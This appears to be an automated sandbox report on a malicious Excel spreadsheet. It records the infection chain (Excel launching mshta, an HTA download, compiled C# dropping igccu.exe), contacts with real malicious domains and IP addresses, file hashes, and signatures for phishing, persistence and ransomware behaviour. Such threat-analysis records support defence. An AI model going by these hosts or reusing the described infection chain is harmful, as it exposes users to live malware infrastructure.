C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3E68.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3E67.tmp"

C:\Users\Admin\AppData\Roaming\igccu.exe

"C:\Users\Admin\AppData\Roaming\igccu.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 lnkz.at udp
US 104.21.18.65:80 lnkz.at tcp
US 104.21.18.65:443 lnkz.at tcp
US 172.245.135.155:80 172.245.135.155 tcp
US 104.21.18.65:443 lnkz.at tcp
US 172.245.135.155:80 172.245.135.155 tcp
BG 91.92.120.127:80 91.92.120.127 tcp
US 8.8.8.8:53 lenscommunity.za.com udp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 tcp

Files

memory/1196-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1196-1-0x000000007269D000-0x00000000726A8000-memory.dmp

memory/2436-21-0x00000000025E0000-0x00000000025E2000-memory.dmp

memory/1196-22-0x0000000002ED0000-0x0000000002ED2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\Ciguy[1].htm

MD5 0104c301c5e02bd6148b8703d19b3a73
SHA1 7436e0b4b1f8c222c38069890b75fa2baf9ca620
SHA256 446a6087825fa73eadb045e5a2e9e2adf7df241b571228187728191d961dda1f
SHA512 84427b656a6234a651a6d8285c103645b861a18a6c5af4abb5cb4f3beb5a4f0df4a74603a0896c7608790fbb886dc40508e92d5709f44dca05dd46c8316d15bf

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\8Y2836BA.txt

MD5 eb8e5d6ec5cca9c60608d5f23c7f0180
SHA1 56387177e3cf9c8f2aa58f50c6d3ed7a4efea680
SHA256 efd1705d8cf75b4197ba248e18c634e3f4b7f066b92e21e4998fa79ea0a3d34f
SHA512 3dcb64d59425295e28c136715e350956ab103d80e89bb0ffa7747db567e5b03f8e71411c8292a7fe603ebe1becb421aa0ab2034ff797b86f643a25722fa35849

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 1cb06f1e183e4e348ce60eeb1e427c30
SHA1 d636a267b36c2ca8476ea854391fbf8cd190bedb
SHA256 85514277b4b716f4e503a270445f06ff816c378c6b54917c2107b440ad5cee93
SHA512 247145cb9a3bba1c4c161ae60ed18370aa8e01666669e3c87ffa464a6b5d098a47cf4ad467f234ad6b84c39b36d617aa1ab365731385511127123e5c8c5943cd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 b0b14bfdb6d427e2d183fc2575d6f673
SHA1 b0963448fc8dd40b2405e43509b0b8fb4fa70c34
SHA256 ee9b46f3ab6ac26ad3bf22cf1fa724efa675e6b9f2ef5556530394f2bab68297
SHA512 dfb342e550c29e227f0719a57e18e3912dd43ac735e2865b3b5eeea0187820a1cfaa1420b3eeb124f0345a8c69cbfae3b7e29268cbfe42df6e8c5be465999b77

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9115ea4e2f57d441ee03f5582611b6d0
SHA1 41f02027cba47eb6158e2c47828de96b1033b6b0
SHA256 43293153f05c8e615959ed528918a332b1f2e6ac082c23d607f4405acd0c7917
SHA512 2ca226bdf8578511c6bc9350106fb69485b9a1da82dc3496eedae70654b691c875e63c0ca5a496eed231f334609e761d2e88115025e04e32b2d5bbd5b239827c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8885c7cb3463d397fb8cb09e1c0510c0
SHA1 7509f1aeec4bd642fc488a91c059a905a1ebb9d0
C:\Users\Admin\AppData\Local\Temp\Cab362D.tmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\alz[1].hta

\??\c:\Users\Admin\AppData\Local\Temp\hrpecqqj.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\hrpecqqj.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\CSC3E67.tmp

C:\Users\Admin\AppData\Local\Temp\hrpecqqj.pdb

C:\Users\Admin\AppData\Local\Temp\hrpecqqj.dll

C:\Users\Admin\AppData\Local\Temp\RES3E68.tmp

C:\Users\Admin\AppData\Roaming\igccu.exe

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-26 17:16

Reported

2024-06-26 17:18

Platform

win10v2004-20240611-en

Max time kernel

143s

Max time network

126s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\New Project 7V3655511.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Detected phishing page

phishing

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1556 wrote to memory of 4372 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 1556 wrote to memory of 4372 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\New Project 7V3655511.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network


Files
